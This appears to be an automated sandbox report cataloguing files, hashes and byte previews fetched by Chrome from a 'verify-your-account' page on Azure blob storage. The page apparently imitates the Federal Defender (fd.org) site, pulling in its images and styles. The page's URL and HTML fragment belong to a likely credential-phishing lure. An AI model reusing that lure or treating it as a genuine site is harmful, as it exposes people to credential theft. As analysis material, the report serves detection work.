                                          Preview:#views-slideshow-form-wrapper .form-item.dependent-options{padding-left:5px;}#views-slideshow-form-wrapper .vs-dependent{padding-left:30px;}..ctools-locked{color:red;border:1px solid red;padding:1em;}.ctools-owns-lock{background:#ffffdd none repeat scroll 0 0;border:1px solid #f0c020;padding:1em;}a.ctools-ajaxing,input.ctools-ajaxing,button.ctools-ajaxing,select.ctools-ajaxing{padding-right:18px !important;background:url(/sites/all/modules/ctools/images/status-active.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(/sites/all/modules/ctools/images/status-active.gif) center center no-repeat;}.div.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane div.admin-links li a{color:#ccc;}div.panel-pane div.admin-links li{padding-bottom:2px;background:white;z-index:201;}div.panel-pane div.admin-links:hover a,div.panel-pane div.admin-links-hover a{color:#000;}div.panel-pane div.admin-links a:before{content:"[";}div.panel-pane div.admi
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 9 x 9, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):986
                                          Entropy (8bit):6.045316084529673
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0228F73F334F4C2780A6368D262D28EE
                                          SHA1:57DCAFD0CE4AD4FAE96DD949F28515C70F12F7DD
                                          SHA-256:91BC8A55957E14A2857F7F97C7FB6DB57E992EC9DD106F049031875A7480363D
                                          SHA-512:F5FC8B0D6220EC4CD4FE42562F9F4EBA5ACC78B05411448F8324E5720A729CE692CF0788CB33CE666557A20FF730BA8FAE4D42DD42096DAD824226E76BE4B2AE
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/all/themes/om_fd/images/bullet-rt.png
                                          Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)" xmpMM:InstanceID="xmp.iid:F7286CCB5A7D11E6A73DF70BE4677CBB" xmpMM:DocumentID="xmp.did:F7286CCC5A7D11E6A73DF70BE4677CBB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F7286CC95A7D11E6A73DF70BE4677CBB" stRef:documentID="xmp.did:F7286CCA5A7D11E6A73DF70BE4677CBB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......HIDATx.b...?........s>.b......*.......0..Bl.0..R.VH."FB............. .....A........IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text
                                          Category:downloaded
                                          Size (bytes):348963
                                          Entropy (8bit):4.946484197229755
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:88708583D620D99FFCDEC7BEAC03DAD7
                                          SHA1:1498497732732E3DDCE703C0642537F10A3E11F7
                                          SHA-256:585076789F679C0A3F57057E8502848BD58286FC426C5344A8846B77B830A492
                                          SHA-512:010356959F15048EB32C8C8C449B8FA99982B547C9E4D274A655E12156D3FB26B1B7E6FB8C10C9DB39C6133870FD8112AE72EF782B9739874915F8936A8FC743
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D
                                          Preview:<html lang="...">..<head>. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. Styles, Javascript and other things go here -->. <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>. <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>. <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=". crossorigin="anonymous"></script>. Required meta tags -->. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">. <link rel="icon" id="favicon" type="image/png" sizes="192x192". href="https://www.google.com/s2/favicons?domain=?v=BUILD_HASH">.. Bootstrap CSS -->. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1ao
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, baseline, precision 8, 685x7, components 3
                                          Category:dropped
                                          Size (bytes):1182
                                          Entropy (8bit):7.15270060670546
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:63F9AF1A98BE4E8EEF61EBDCBEA5DB2A
                                          SHA1:9006ECACAF5E25F2F240BF7BA5DDCA44E319C643
                                          SHA-256:26F297D6296648A62E98AC6595669132C5C4812E58B1B0BEB0874CF11A11C2E7
                                          SHA-512:058E63F7E894A55FB7A71A5B5C17038D9658E27EFF3E3516E2050B96DCEB7132B5EAE474152CCE1B6FE759C02BFEECBFE318AB42B7076C1FB7FDB9E3319D1971
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.............................................................................................................................................V....Adobe.d...........................{.................................................................!1....ASa....."QR......23Bq....Cr..b................................?...|.<...6 ......5. >........I.[.s..C......2...F..fbu.Z?@..U..7.X.G.|.F......~...0.)."..I.8?E ..V%....E...5g......rX.G|.@x.C.......!.L.....I....Pv*.h .`...L.........~..X.A$....... .X.B&..\..h.X..2.;?.m@8.@&.X.T........5U...._PZ3...UnG.......'...&qq.$.Gvg. ....3....$.....u...e.....`A.b..G.uq...8...@v.dH[.@2W....@.[..vJ.}.W....<<...-....TC..v.}R.`..'.gt.a..`.rO..1..A#.HY$.n....a.. .n..T..dz..wy. ..4..^...8.....w.2...6.......6.....#.}....d~..w..4.b~...`k....d..*e.../..rG....AA.hP.oLT5y.vI.z.}.P6qM..N..>p...wz.1W...]L[m. ..P3.:=Gfd.%....*.d...uqA.......6k..[C3:u=UlAA.xp....6qs.frp..1gh@.y@.......%....w'..`$<.f..+..w.h..w...(0&....bBS.h(0..+..MxH .. A
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 25.3 (Windows), datetime=2024:01:08 10:07:15], baseline, precision 8, 260x130, components 3
                                          Category:dropped
                                          Size (bytes):24786
                                          Entropy (8bit):7.030570965163379
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7BE9B11090CDBA1A3707307C5DDAFCD9
                                          SHA1:AAB53506C0934722A010EBF67008EB966BE999EC
                                          SHA-256:8513DB6B96639B9E6223E2F9DBC8F39744756F8926E2C5364C4059EAC9537B2D
                                          SHA-512:C336A6BC12D8CFF703CDD0563757BF4DC9324EFD8515E4759691CD8AB59C4B7EDA0B559E989BFF18BD388B4D0727BE52F56806113C5E6F3A20D9A8EBA12E9F48
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.....YExif..MM.*.............................b...........j.(...........1.........r.2...........i.................x..'....x..'.Adobe Photoshop 25.3 (Windows).2024:01:08 10:07:15........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................P...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...\....NB...)....).`.....H..H\..{.......j..i...D..jlob..B...A..VvAH.y.B.Wb...(..p.(%..).\...d.L...5v'h......-..l.(.l.Kd'"...)mV.\.P..i/....9..b.R
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 25.11 (Windows), datetime=2024:09:09 09:30:28], baseline, precision 8, 465x270, components 3
                                          Category:downloaded
                                          Size (bytes):61685
                                          Entropy (8bit):7.804074211141364
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:94741465D2B011F4130F40EAA1355BE2
                                          SHA1:5CF27A351E83C883400A8E24EFD747D77073B90D
                                          SHA-256:3B436D613ACA1AA711E8931F43095E57E98E7905DAA4AB00953B9CDAC6C9D575
                                          SHA-512:BB38C1E46A4A5B1D39B9E3602F94B683A1C6CC839E6D414A35AB52B2388503211EEF0DC0A51A35093380E7F14741CC9EBC54B211EFB68509F33C5990A184B5B3
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/training/images/60th_anniversary.jpg
                                          Preview:.....-Exif..MM.*.............................b...........j.(...........1..... ...r.2...........i...............-....'..-....'.Adobe Photoshop 25.11 (Windows).2024:09:09 09:30:28......................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................A.p.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..Uo...04..Sl...X.^...4..X..V....#..f.....U...L....]G..v...].s->.Z.?.s1..C....QGT.....4:.oa..lu..jo...2..w..K...V.n.a.d....m. ....w...*f..1.F.lc,.y.Y
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (19015)
                                          Category:downloaded
                                          Size (bytes):19188
                                          Entropy (8bit):5.212814407014048
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):9711
                                          Entropy (8bit):7.972380189428703
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:52640BF7B4AB3D3CA9F7BF4AEBDA0D4F
                                          SHA1:0725BAF8C96FE4B5CC860AA1F33A5376449150B0
                                          SHA-256:F4C817B70EC5BA8C65B0A35232C364B3084A23E9043518EEEEF1086D18FDB1A2
                                          SHA-512:43D0C58895E4FD4EDFB7D8397BDF7B3178721ACCFF8DC99C4B52A9C0AD8EE8066044C3F81C4483F1B7372C81E833D71A094B0DC85DD634F20633611E2F0BA7B5
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://logo.clearbit.com/fd.org
                                          Preview:.PNG........IHDR..............>a...%.IDATx...|T..?.../.CBB...P.ED.E..T.;`.W_.m.o......E.....j..*..Vd.....;.=.,d.f.g...3..d...e&._...|.w..{.y..l.9.Q./x.C..g/.\(..EH._........s..5|..^..F.Q.q.^q3..6....>R../.X..5......]../.N....py......m.."A...9....J@.......mC..c|...l...G...~.......\.......7D...L..*..*.:T.}..{....4.L_.......).G..6...^K.!.....Sy.......^..%.[#.D..s...K.Fr.O`.L..%......B.....^.dB.... .b* .@...~..X..H...-6.fg..<.X"Q...D.....3_.....o.D..=.]....f.!...d.`r,.......,..W..L..C.?O@4$Z.M....j.\z[....0\..?...d.y.D.X..=.=..C%..?Z....t.y..).h..P..%-..=2.m.B.@.%......]..>q.y....+o.....-.-.h.....X...+^..3............^.....~f.0.......}@`...7.....u\....8....w....Z.,Zm........q.D.RS5........R.........(eP..<...W...A..z.....p...-v...... M.....s.i:.......=_.T).....f......\L.%.k...1.Q..IYz...A.C.=8k......&;.V......S.W..H....ir..h.Q.1.{..}...m...sK.....h..@.T<~u>..bl.6&..Sm...xzk.,.&.t-...{c...*.F.,.'..w.~....6`...^..;.....g@)...n....p3..h...&...N..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 341x150, components 3
                                          Category:downloaded
                                          Size (bytes):15534
                                          Entropy (8bit):7.948408036870925
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:15C91BEA10EC1EA6DAADFD409FFB7CAC
                                          SHA1:22620F0CC72CE0992162482B6F1188A727476FB6
                                          SHA-256:31B6EE5F104E745829C20E182B8F6C1CBCDE50A10716FA46A5B2FC03B045849C
                                          SHA-512:EC7E55420DCB4272077DD9D7D1D601CC5D05EC3A6C78B849BFAAF2B086A9FDD892928211E14564A56B55710BEEC4BF2D5ED2DFFCAC7F6904D7249FEBE3B0ADF7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/fd-logo_0.jpg
                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:B4FE22AE16B311E6B5EE82812BD6E912" xmpMM:DocumentID="xmp.did:B4FE22AF16B311E6B5EE82812BD6E912"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B4FE22AC16B311E6B5EE82812BD6E912" stRef:documentID="xmp.did:B4FE22AD16B311E6B5EE82812BD6E912"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 465 x 270, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):145969
                                          Entropy (8bit):7.990862203389143
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:16C9D1F50DD830252B7E23C7FBD9D668
                                          SHA1:7FBFC13022FFA0DD6EBEA190C50A6371737D82BC
                                          SHA-256:1D417C88281C734CD89EAF74AC6DAB9AED0520F1AC7B75B3A3565E2B4F451D23
                                          SHA-512:844A3CAAF6CFCEE67815180840BED83A25733A1207F4AF8DC2CAE8FE2EAF4785BF400BD2A34C0D8F0D985997D0C7B62626584FB4F8C3398A3D0F593FA9115EE3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR..............-a....pHYs.........g..R..9.IDATx..w.]Wu...{.sn.>#i.{.z.$..1.`0.t....RH..!$.@B......S.q/.-.,.......N.{...sG#7lbl... <s.s.=w.....g.`.a.c....0..!..j..0.1.a.c........c....0....o./J)..<.W.x..8..x..z\.....a.i..x.a...}.m......./~.$I^..{.....$.`%.@..@...!...~....3.d.1.......Z./......#}.=.>.{...3.2..~.X....0P*.).j..0..T.......C..~L.mmme......G.......)UB.$!.c.(&..I.#...=. .S..s?766...~....C..n......0..JAy.QX}....Q....0......x..L...Byhd..Tf.X....s..v...}.9..E.@.R.P...+e.&1.$.Z..$Fk....Wx...._...G!.S_.Q..4.}F..0.}.S&Ob..vF4.).r4.....X..c.:..z...=..xiH.F..:I...a.c.....\xF...o.k..V..`p....N...Y....K..w......p?.v.b..}.......0"L..(.m@kG.*.^E.yF1..k..uG$...0...'.~@..!.g.........2.)...0z$...}d..3....k..`j'...\.........0.00.D_&..C-.J........YYO....j.O.}.=...{.............`..0Z...<.....W..0H4....!.,...k.$h..Uh-.FB.h.M$......;...UO....G..f.ne..ff...'-c..57....F.$I...L.B.a).0.1.?(.......k............G7....V...=..F.b.T..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, baseline, precision 8, 821x7, components 3
                                          Category:dropped
                                          Size (bytes):1295
                                          Entropy (8bit):7.246128884460634
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:362296C51FAEF8F69F5DCF613DE7D835
                                          SHA1:3831B294A9480DC24041C7E72FB641EB7BD7D4D9
                                          SHA-256:41CC6050EFAA9BAF3BA1F34F3B402889C5C5002472B14BE24CF9B7B28D0DD8A9
                                          SHA-512:DF116F11530CE17EFCB56E7764A5A475F377CB8CCB9E680A70BAC5F592D4C0C6F87C882C5FC9BF2EC523AD626AC938DA12E6FFEC8E7DE2D0A13A920522BF60F1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.............................................................................................................................................g....Adobe.d.............5.............}..................................................................!1.....AQRS....aq......"2Bb..#....3CTr...............................?...h..*......$J...1..P.....P!w3Z.N...B.|..&.~.tP'5...;.@.....M#.l..'5..c.z.e.&$.A.B. ...;.@<.'.......G..h..$.1....nK.E~.G}(.&....7 c.rCAT..}..rjE......!..#.Zw...ZHa.Y.. ..r....H.#r.....;....|.......g../......jP...V.wy..3O..3.Y..?.z.-.n.P.4... .&.j......A...z........z.g...I.vf=!..[;. ......:.e.....h.Z.....$.:.l.(.lX....+..(.k.{6\|(..S.{....1...5n.VV..!.S.j.Q.l...&..kf..@....G.S...Y..;.;%8...,..Jp. ..J.Z.d.0. ..u..6p..^..'...J........F...&}.f7....>...&m.R...6..o.@...qHb....y.gi. I.tl....Y.s.Y.|H.b..!.j.f...@.F........A.l.?....N..)..&..g....)..0d.o..M;.Q...b..+(..q.....^.+...\V...!......k.{6\|(.M..f..&..ca..A.WX.z&T.......d....@c..........w+.0
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (50758)
                                          Category:downloaded
                                          Size (bytes):51039
                                          Entropy (8bit):5.247253437401007
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (2917)
                                          Category:downloaded
                                          Size (bytes):9593
                                          Entropy (8bit):5.012343952011305
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E16222C91B48AE56E9E23563DA43F672
                                          SHA1:4142C6C3C7511942EC8D0613B8404C11ADE6BA5A
                                          SHA-256:F45845D42790A8E69030480881F0586E838E99B96F608FF6897EBC645588BDCE
                                          SHA-512:6095DFAB256FAE155F823F7A904F8E4BD47F23B80F66CEB216231E04E919F29591F94B119631F8D475543C0D48621FF835F20B0327AA4A55748BD50DA3F1A9F6
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/css/css_9FhF1CeQqOaQMEgIgfBYboOOmblvYI_2iX68ZFWIvc4.css
                                          Preview:#autocomplete{position:absolute;z-index:100;overflow:hidden;}#autocomplete ul{margin:0;padding:0;list-style:none;list-style-image:none;}#autocomplete li{cursor:default;white-space:pre;zoom:1;}html.js .form-autocomplete{background-image:url(/sites/all/themes/omega/omega/images/misc/throbber.gif?1382488163);background-position:100% 2px;background-repeat:no-repeat;}html.js .throbbing{background-position:100% -18px;}html.js fieldset.collapsed{height:1em;}html.js fieldset.collapsed .fieldset-wrapper{display:none;}fieldset.collapsible{position:relative;}fieldset.collapsible .fieldset-legend{display:block;}.form-textarea-wrapper textarea{display:block;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;width:100%;margin:0;}.resizable-textarea .grippie{height:9px;background:#eee url(/sites/all/themes/omega/omega/images/misc/grippie.png?1382488163) no-repeat center 2px;border:1px solid #ddd;border-top-width:0;cursor:s-resize;overflow:hidden;}body.drag{cursor:move;}.ta
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 465 x 270, 8-bit/color RGB, non-interlaced
                                          Category:downloaded
                                          Size (bytes):53842
                                          Entropy (8bit):7.973021191986151
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:536C6B9301CE298AB8B7C6D30CF1B68B
                                          SHA1:A76974EAE20464F78BF64228B39F233FA56DE355
                                          SHA-256:19002E0B861743DDD8E58108B6C93195C35044A552556B7FCAEDDCD180F8971E
                                          SHA-512:7F079BF6092E9D467E2FC0A691E74425B9E6FEE0BC67B252615315B26A8B9C1DF3C0CB3CBAED9E00214C165DADEF025A6183DCB4B7C90D22A09C99EA0AC7A321
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/training/images/nlst.png
                                          Preview:.PNG........IHDR.............Y.6....pHYs..........+......IDATx...Y.$G.&.}......'r.^......:....{.{...C.......GQ.d?.P.).i.w.v.[w...BU.. .e"..csw3U=..jfn........L.'.......G.~z.Ry.|U..[<..B...@....DJ, ..@8l....=.R..y..:.a@..(.._.aF...R......|....G.D`...p-Zi..s.U..'S.....qu.....{..!f'.C....5........q=..j.....b...........N&.....qu.C.*..;.QD..!.,-XvUU.c...../~..7.....U(..-E..@..bY,`.b4..H<..Np..ReU......HbE.~....]:..... 1.o........o?....3.766.h..R.en.,.d.1pIt"sOp.....X..m2..B...O.^...............U....?..W....z..'O..e.D@.f.$.....x:.sOp.....`5...).......U5|x.....2....U.,....p...Ev..gVN.GaD,.H...Z..b.....8.=..Np......[.R.\.d...k...,..../..^ND.8k..}.....#YbR.$sAJ$..HQb........'...%.....E..D......_]^...e........D..R..E.dz..Q}.......DF.!...6.+s^.$F.'x.1..N3...`.."2J......H.e+.V...yQ.'..V..P..L......$.X.R.X...".+........../s.....U.d\.`w......{.*@D.W.6.H.8.(.....@Q..Zc9..`.i..U..B U.............O.....}.+=.W'x.H....J.!.....:.nX....`.1..ZVQU....p..F.!xr".K.Enb.!...n......=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (14181)
                                          Category:dropped
                                          Size (bytes):14265
                                          Entropy (8bit):5.155891752872181
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2EBF0D88E73A9C8D5E6D55A1A1CECA01
                                          SHA1:962359C8CD63A3F8436171AD46D97D9F29ABAC4D
                                          SHA-256:2B26394AAC8199778CD337D8046535B6EA9CB2DC698E4102029CA963E080E19F
                                          SHA-512:AAE1C2A7759B04D9302DF61431DF8AC01020A55BA426EE4C9DCB906965E00AB7E073108902AFDFA3EA2AAD128E8FE50A126C8C086DED6FC441EB75BE126ACE06
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* axios v0.20.0 | (c) 2020 by Matt Zabriskie */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new s(e),n=i(s.prototype.request,t);return o.extend(n,s.prototype,t),o.extend(n,t),n}var o=n(2),i=n(3),s=n(4),a=n(22),u=n(10),c=r(u);c.Axios=s,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefined"==typeof e}functi
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):9
                                          Entropy (8bit):2.94770277922009
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:722969577A96CA3953E84E3D949DEE81
                                          SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                          SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                          SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kit.fontawesome.com/585b051251.js
                                          Preview:Forbidden
                                          No static file info